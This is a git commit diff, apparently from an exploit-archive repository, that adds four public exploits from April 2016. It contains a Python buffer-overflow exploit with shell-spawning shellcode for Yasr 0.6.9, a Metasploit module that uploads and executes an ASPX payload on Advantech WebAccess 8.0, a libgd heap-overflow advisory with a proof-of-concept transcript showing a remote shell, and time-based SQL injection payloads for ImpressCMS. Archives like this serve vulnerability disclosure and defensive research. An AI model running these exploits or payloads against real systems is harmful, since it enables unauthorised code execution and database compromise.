DB: 2016-04-27
4 new exploits Yasr Screen Reader 0.6.9 - Local Buffer Overflow Advantech WebAccess Dashboard Viewer Arbitrary File Upload libgd 2.1.1 - Signedness Heap Overflow ImpressCMS 1.3.9 - SQL Injection
This commit is contained in:
parent
39fe341c5b
commit
fe5081847e
5 changed files with 525 additions and 0 deletions
|
@ -35945,3 +35945,7 @@ id,file,description,date,author,platform,type,port
|
|||
39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)",2016-04-25,"Jonathan Smith",win32,remote,21
|
||||
39730,platforms/ruby/webapps/39730.txt,"NationBuilder Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443
|
||||
39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0
|
||||
39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0
|
||||
39735,platforms/windows/remote/39735.rb,"Advantech WebAccess Dashboard Viewer Arbitrary File Upload",2016-04-26,metasploit,windows,remote,80
|
||||
39736,platforms/linux/remote/39736.txt,"libgd 2.1.1 - Signedness Heap Overflow",2016-04-26,"Hans Jerry Illikainen",linux,remote,0
|
||||
39737,platforms/php/webapps/39737.txt,"ImpressCMS 1.3.9 - SQL Injection",2016-04-26,"Manuel García Cárdenas",php,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
66
platforms/linux/local/39734.py
Executable file
66
platforms/linux/local/39734.py
Executable file
|
@ -0,0 +1,66 @@
|
|||
'''
|
||||
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
|
||||
# Program affected: General-purpose console screen reader
|
||||
# Version: 0.6.9-5
|
||||
#
|
||||
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
|
||||
# Program description: Yasr is a general-purpose console screen reader
|
||||
for GNU/Linux and other Unix-like operating systems.
|
||||
# Kali Linux 2.0 package: pool/main/y/yasr/yasr_0.6.9-5_i386.deb
|
||||
# MD5sum: 910f4b41fd09d5486b935097dc8dd2f8
|
||||
# Website: http://yasr.sourceforge.net/
|
||||
#
|
||||
#
|
||||
# Starting program: /usr/bin/yasr -p $(python -c 'print "\x90"*258')
|
||||
# [Thread debugging using libthread_db enabled]
|
||||
# Using host libthread_db library
|
||||
"/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
|
||||
# Program received signal SIGSEGV, Segmentation fault.
|
||||
#
|
||||
# 0x90909090 in ?? ()
|
||||
#
|
||||
#gdb$ backtrace
|
||||
#0 0xb7fdebe0 in __kernel_vsyscall ()
|
||||
#1 0xb7e33367 in __GI_raise (sig=sig@entry=0x6) at
|
||||
../nptl/sysdeps/unix/sysv/linux/raise.c:56
|
||||
#2 0xb7e34a23 in __GI_abort () at abort.c:89
|
||||
#3 0xb7e71778 in __libc_message (do_abort=do_abort@entry=0x2,
|
||||
fmt=fmt@entry=0xb7f67715 "*** %s ***: %s terminated\n") at
|
||||
../sysdeps/posix/libc_fatal.c:175
|
||||
#4 0xb7f01b85 in __GI___fortify_fail (msg=msg@entry=0xb7f67696
|
||||
"buffer overflow detected") at fortify_fail.c:31
|
||||
#5 0xb7effc3a in __GI___chk_fail () at chk_fail.c:28
|
||||
'''
|
||||
|
||||
import os, subprocess
|
||||
|
||||
def run():
|
||||
try:
|
||||
print "# Yasr Console Screen Reader - Buffer Overflow by Juan Sacco"
|
||||
print "# This exploit is for educational purposes only"
|
||||
# JUNK + SHELLCODE + NOPS + EIP
|
||||
|
||||
junk = "\x41"*298
|
||||
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
|
||||
nops = "\x90"*12
|
||||
eip = "\xd2\xf3\xff\xbf"
|
||||
subprocess.call(["yasr ",'-p ', junk + shellcode + nops + eip])
|
||||
|
||||
except OSError as e:
|
||||
if e.errno == os.errno.ENOENT:
|
||||
print "Sorry, Yasr Console Reader - Not found!"
|
||||
else:
|
||||
print "Error executing exploit"
|
||||
raise
|
||||
|
||||
def howtousage():
|
||||
print "Snap! Something went wrong"
|
||||
sys.exit(-1)
|
||||
|
||||
if __name__ == '__main__':
|
||||
try:
|
||||
print "Exploit Yasr 0.6.9-5 Local Overflow Exploit"
|
||||
print "Author: Juan Sacco"
|
||||
except IndexError:
|
||||
howtousage()
|
||||
run()
|
241
platforms/linux/remote/39736.txt
Executable file
241
platforms/linux/remote/39736.txt
Executable file
|
@ -0,0 +1,241 @@
|
|||
Overview
|
||||
========
|
||||
|
||||
libgd [1] is an open-source image library. It is perhaps primarily used
|
||||
by the PHP project. It has been bundled with the default installation
|
||||
of PHP since version 4.3 [2].
|
||||
|
||||
A signedness vulnerability (CVE-2016-3074) exist in libgd 2.1.1 which
|
||||
may result in a heap overflow when processing compressed gd2 data.
|
||||
|
||||
|
||||
Details
|
||||
=======
|
||||
|
||||
4 bytes representing the chunk index size is stored in a signed integer,
|
||||
chunkIdx[i].size, by `gdGetInt()' during the parsing of GD2 headers:
|
||||
|
||||
libgd-2.1.1/src/gd_gd2.c:
|
||||
,----
|
||||
| 53 typedef struct {
|
||||
| 54 int offset;
|
||||
| 55 int size;
|
||||
| 56 }
|
||||
| 57 t_chunk_info;
|
||||
`----
|
||||
|
||||
|
||||
libgd-2.1.1/src/gd_gd2.c:
|
||||
,----
|
||||
| 65 static int
|
||||
| 66 _gd2GetHeader (gdIOCtxPtr in, int *sx, int *sy,
|
||||
| 67 int *cs, int *vers, int *fmt, int *ncx, int *ncy,
|
||||
| 68 t_chunk_info ** chunkIdx)
|
||||
| 69 {
|
||||
| ...
|
||||
| 73 t_chunk_info *cidx;
|
||||
| ...
|
||||
| 155 if (gd2_compressed (*fmt)) {
|
||||
| ...
|
||||
| 163 for (i = 0; i < nc; i++) {
|
||||
| ...
|
||||
| 167 if (gdGetInt (&cidx[i].size, in) != 1) {
|
||||
| 168 goto fail2;
|
||||
| 169 };
|
||||
| 170 };
|
||||
| 171 *chunkIdx = cidx;
|
||||
| 172 };
|
||||
| ...
|
||||
| 181 }
|
||||
`----
|
||||
|
||||
|
||||
`gdImageCreateFromGd2Ctx()' and `gdImageCreateFromGd2PartCtx()' then
|
||||
allocates memory for the compressed data based on the value of the
|
||||
largest chunk size:
|
||||
|
||||
libgd-2.1.1/src/gd_gd2.c:
|
||||
,----
|
||||
| 371|637 if (gd2_compressed (fmt)) {
|
||||
| 372|638 /* Find the maximum compressed chunk size. */
|
||||
| 373|639 compMax = 0;
|
||||
| 374|640 for (i = 0; (i < nc); i++) {
|
||||
| 375|641 if (chunkIdx[i].size > compMax) {
|
||||
| 376|642 compMax = chunkIdx[i].size;
|
||||
| 377|643 };
|
||||
| 378|644 };
|
||||
| 379|645 compMax++;
|
||||
| ...|...
|
||||
| 387|656 compBuf = gdCalloc (compMax, 1);
|
||||
| ...|...
|
||||
| 393|661 };
|
||||
`----
|
||||
|
||||
|
||||
A size of <= 0 results in `compMax' retaining its initial value during
|
||||
the loop, followed by it being incremented to 1. Since `compMax' is
|
||||
used as the nmemb for `gdCalloc()', this leads to a 1*1 byte allocation
|
||||
for `compBuf'.
|
||||
|
||||
This is followed by compressed data being read to `compBuf' based on the
|
||||
current (potentially negative) chunk size:
|
||||
|
||||
libgd-2.1.1/src/gd_gd2.c:
|
||||
,----
|
||||
| 339 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2Ctx (gdIOCtxPtr in)
|
||||
| 340 {
|
||||
| ...
|
||||
| 413 if (gd2_compressed (fmt)) {
|
||||
| 414
|
||||
| 415 chunkLen = chunkMax;
|
||||
| 416
|
||||
| 417 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,
|
||||
| 418 compBuf,
|
||||
| 419 chunkIdx[chunkNum].size,
|
||||
| 420 (char *) chunkBuf, &chunkLen, in)) {
|
||||
| 421 GD2_DBG (printf ("Error reading comproessed chunk\n"));
|
||||
| 422 goto fail;
|
||||
| 423 };
|
||||
| 424
|
||||
| 425 chunkPos = 0;
|
||||
| 426 };
|
||||
| ...
|
||||
| 501 }
|
||||
`----
|
||||
|
||||
|
||||
libgd-2.1.1/src/gd_gd2.c:
|
||||
,----
|
||||
| 585 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2PartCtx (gdIOCtx * in, int srcx, int srcy, int w, int h)
|
||||
| 586 {
|
||||
| ...
|
||||
| 713 if (!gd2_compressed (fmt)) {
|
||||
| ...
|
||||
| 731 } else {
|
||||
| 732 chunkNum = cx + cy * ncx;
|
||||
| 733
|
||||
| 734 chunkLen = chunkMax;
|
||||
| 735 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,
|
||||
| 736 compBuf,
|
||||
| 737 chunkIdx[chunkNum].size,
|
||||
| 738 (char *) chunkBuf, &chunkLen, in)) {
|
||||
| 739 printf ("Error reading comproessed chunk\n");
|
||||
| 740 goto fail2;
|
||||
| 741 };
|
||||
| ...
|
||||
| 746 };
|
||||
| ...
|
||||
| 815 }
|
||||
`----
|
||||
|
||||
|
||||
The size is subsequently interpreted as a size_t by `fread()' or
|
||||
`memcpy()', depending on how the image is read:
|
||||
|
||||
libgd-2.1.1/src/gd_gd2.c:
|
||||
,----
|
||||
| 221 static int
|
||||
| 222 _gd2ReadChunk (int offset, char *compBuf, int compSize, char *chunkBuf,
|
||||
| 223 uLongf * chunkLen, gdIOCtx * in)
|
||||
| 224 {
|
||||
| ...
|
||||
| 236 if (gdGetBuf (compBuf, compSize, in) != compSize) {
|
||||
| 237 return FALSE;
|
||||
| 238 };
|
||||
| ...
|
||||
| 251 }
|
||||
`----
|
||||
|
||||
libgd-2.1.1/src/gd_io.c:
|
||||
,----
|
||||
| 211 int gdGetBuf(void *buf, int size, gdIOCtx *ctx)
|
||||
| 212 {
|
||||
| 213 return (ctx->getBuf)(ctx, buf, size);
|
||||
| 214 }
|
||||
`----
|
||||
|
||||
|
||||
For file contexts:
|
||||
|
||||
libgd-2.1.1/src/gd_io_file.c:
|
||||
,----
|
||||
| 52 BGD_DECLARE(gdIOCtx *) gdNewFileCtx(FILE *f)
|
||||
| 53 {
|
||||
| ...
|
||||
| 67 ctx->ctx.getBuf = fileGetbuf;
|
||||
| ...
|
||||
| 76 }
|
||||
| ...
|
||||
| 92 static int fileGetbuf(gdIOCtx *ctx, void *buf, int size)
|
||||
| 93 {
|
||||
| 94 fileIOCtx *fctx;
|
||||
| 95 fctx = (fileIOCtx *)ctx;
|
||||
| 96
|
||||
| 97 return (fread(buf, 1, size, fctx->f));
|
||||
| 98 }
|
||||
`----
|
||||
|
||||
|
||||
And for dynamic contexts:
|
||||
|
||||
libgd-2.1.1/src/gd_io_dp.c:
|
||||
,----
|
||||
| 74 BGD_DECLARE(gdIOCtx *) gdNewDynamicCtxEx(int initialSize, void *data, int freeOKFlag)
|
||||
| 75 {
|
||||
| ...
|
||||
| 95 ctx->ctx.getBuf = dynamicGetbuf;
|
||||
| ...
|
||||
| 104 }
|
||||
| ...
|
||||
| 256 static int dynamicGetbuf(gdIOCtxPtr ctx, void *buf, int len)
|
||||
| 257 {
|
||||
| ...
|
||||
| 280 memcpy(buf, (void *) ((char *)dp->data + dp->pos), rlen);
|
||||
| ...
|
||||
| 284 }
|
||||
`----
|
||||
|
||||
|
||||
PoC
|
||||
===
|
||||
|
||||
Against Ubuntu 15.10 amd64 running nginx with php5-fpm and php5-gd [3]:
|
||||
|
||||
,----
|
||||
| $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php
|
||||
| [*] this may take a while
|
||||
| [*] offset 912 of 10000...
|
||||
| [+] connected to 1.2.3.4:5555
|
||||
| id
|
||||
| uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
|
|
||||
| uname -a
|
||||
| Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC
|
||||
| 2016 x86_64 x86_64 x86_64 GNU/Linux
|
||||
|
|
||||
| dpkg -l|grep -E "php5-(fpm|gd)"
|
||||
| ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ...
|
||||
| ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ...
|
||||
|
|
||||
| cat upload.php
|
||||
| <?php
|
||||
| imagecreatefromgd2($_FILES["file"]["tmp_name"]);
|
||||
| ?>
|
||||
`----
|
||||
|
||||
|
||||
Solution
|
||||
========
|
||||
|
||||
This bug has been fixed in git HEAD [4].
|
||||
|
||||
Full Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39736.zip
|
||||
|
||||
Footnotes
|
||||
_________
|
||||
|
||||
[1] [http://libgd.org/]
|
||||
[2] [https://en.wikipedia.org/wiki/Libgd]
|
||||
[3] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-3074]
|
||||
[4] [https://github.com/libgd/libgd/commit/2bb97f407c1145c850416a3bfbcc8cf124e68a19]
|
84
platforms/php/webapps/39737.txt
Executable file
84
platforms/php/webapps/39737.txt
Executable file
|
@ -0,0 +1,84 @@
|
|||
=============================================
|
||||
MGC ALERT 2016-002
|
||||
- Original release date: April 8, 2016
|
||||
- Last revised: April 21, 2016
|
||||
- Discovered by: Manuel García Cárdenas
|
||||
- Severity: 7,1/10 (CVSS Base Score)
|
||||
=============================================
|
||||
|
||||
I. VULNERABILITY
|
||||
-------------------------
|
||||
Time-based SQL Injection in Admin panel ImpressCMS <= v1.3.9
|
||||
|
||||
II. BACKGROUND
|
||||
-------------------------
|
||||
ImpressCMS is a community developed Content Management System for easily
|
||||
building and maintaining a dynamic web site.
|
||||
|
||||
III. DESCRIPTION
|
||||
-------------------------
|
||||
This bug was found using the portal with authentication as administrator.
|
||||
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
|
||||
protocol to interact with the application.
|
||||
|
||||
It is possible to inject SQL code in the variable
|
||||
"quicksearch_mod_profile_Field" on the page
|
||||
"/modules/profile/admin/field.php".
|
||||
|
||||
IV. PROOF OF CONCEPT
|
||||
-------------------------
|
||||
The following URL's and parameters have been confirmed to all suffer from
|
||||
Time Based Blind SQL injection.
|
||||
|
||||
quicksearch_mod_profile_Field=aaaa') AND (SELECT * FROM
|
||||
(SELECT(SLEEP(1)))IRLV) AND ('DhUh' LIKE
|
||||
'DhUh&button_quicksearch_mod_profile_Field=Search&filtersel=default&limitsel=15
|
||||
|
||||
quicksearch_mod_profile_Field=aaaa') AND (SELECT * FROM
|
||||
(SELECT(SLEEP(5)))IRLV) AND ('DhUh' LIKE
|
||||
'DhUh&button_quicksearch_mod_profile_Field=Search&filtersel=default&limitsel=15
|
||||
|
||||
V. BUSINESS IMPACT
|
||||
-------------------------
|
||||
Public defacement, confidential data leakage, and database server
|
||||
compromise can result from these attacks. Client systems can also be
|
||||
targeted, and complete compromise of these client systems is also possible.
|
||||
|
||||
VI. SYSTEMS AFFECTED
|
||||
-------------------------
|
||||
ImpressCMS <= v1.3.9
|
||||
|
||||
VII. SOLUTION
|
||||
-------------------------
|
||||
Install vendor patch.
|
||||
|
||||
VIII. REFERENCES
|
||||
-------------------------
|
||||
http://www.impresscms.org/
|
||||
|
||||
IX. CREDITS
|
||||
-------------------------
|
||||
This vulnerability has been discovered and reported
|
||||
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
|
||||
|
||||
X. REVISION HISTORY
|
||||
-------------------------
|
||||
April 8, 2016 1: Initial release
|
||||
April 21, 2016 2: Revision to send to lists
|
||||
|
||||
XI. DISCLOSURE TIMELINE
|
||||
-------------------------
|
||||
April 8, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
|
||||
April 8, 2016 2: Send to vendor
|
||||
April 15, 2016 3: New contact to vendor with no response
|
||||
April 21, 2016 4: Send to the Full-Disclosure lists
|
||||
|
||||
XII. LEGAL NOTICES
|
||||
-------------------------
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
|
||||
XIII. ABOUT
|
||||
-------------------------
|
||||
Manuel Garcia Cardenas
|
||||
Pentester
|
130
platforms/windows/remote/39735.rb
Executable file
130
platforms/windows/remote/39735.rb
Executable file
|
@ -0,0 +1,130 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload",
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
|
||||
|
||||
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
|
||||
of Advantech WebAccess. Authentication is not required to exploit this vulnerability.
|
||||
|
||||
The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within
|
||||
the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to
|
||||
upload arbitrary code (instead of an image) to the server, which will then be executed under the
|
||||
high-privilege context of the IIS AppPool.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'rgod', # Vulnerability discovery
|
||||
'Zhou Yu <504137480[at]qq.com>' # MSF module
|
||||
],
|
||||
'References' => [
|
||||
[ 'CVE', '2016-0854' ],
|
||||
[ 'ZDI', '16-128' ],
|
||||
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01']
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Targets' => [
|
||||
['Advantech WebAccess 8.0', {}]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Feb 5 2016",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
OptString.new('TARGETURI', [true, 'The base path of Advantech WebAccess 8.0', '/'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def version_match(data)
|
||||
# Software Build : 8.0-2015.08.15
|
||||
fingerprint = data.match(/Software\sBuild\s:\s(?<version>\d{1,2}\.\d{1,2})-(?<year>\d{4})\.(?<month>\d{1,2})\.(?<day>\d{1,2})/)
|
||||
fingerprint['version'] unless fingerprint.nil?
|
||||
end
|
||||
|
||||
def vuln_version?
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => target_uri.to_s
|
||||
)
|
||||
|
||||
if res.redirect?
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(res.redirection)
|
||||
)
|
||||
end
|
||||
|
||||
ver = res && res.body ? version_match(res.body) : nil
|
||||
true ? Gem::Version.new(ver) == Gem::Version.new('8.0') : false
|
||||
end
|
||||
|
||||
def check
|
||||
if vuln_version?
|
||||
Exploit::CheckCode::Appears
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def upload_file?(filename, file)
|
||||
uri = normalize_uri(target_uri, 'WADashboard', 'ajax', 'UploadAjaxAction.aspx')
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"')
|
||||
data.add_part(file, nil, nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => uri,
|
||||
'cookie' => "waUserName=admin",
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => data.to_s
|
||||
)
|
||||
true ? res && res.code == 200 && res.body.include?("{\"resStatus\":\"0\",\"resString\":\"\/#{filename}\"}") : false
|
||||
end
|
||||
|
||||
def exec_file?(filename)
|
||||
uri = normalize_uri(target_uri)
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
)
|
||||
|
||||
uri = normalize_uri(target_uri, 'WADashboard', filename)
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => uri,
|
||||
'cookie' => res.get_cookies
|
||||
)
|
||||
true ? res && res.code == 200 : false
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless vuln_version?
|
||||
print_status("#{peer} - Cannot reliably check exploitability.")
|
||||
return
|
||||
end
|
||||
filename = "#{Rex::Text.rand_text_alpha(5)}.aspx"
|
||||
filedata = Msf::Util::EXE.to_exe_aspx(generate_payload_exe)
|
||||
|
||||
print_status("#{peer} - Uploading malicious file...")
|
||||
return unless upload_file?(filename, filedata)
|
||||
|
||||
print_status("#{peer} - Executing #{filename}...")
|
||||
return unless exec_file?(filename)
|
||||
end
|
||||
end
|
Loading…
Add table
Reference in a new issue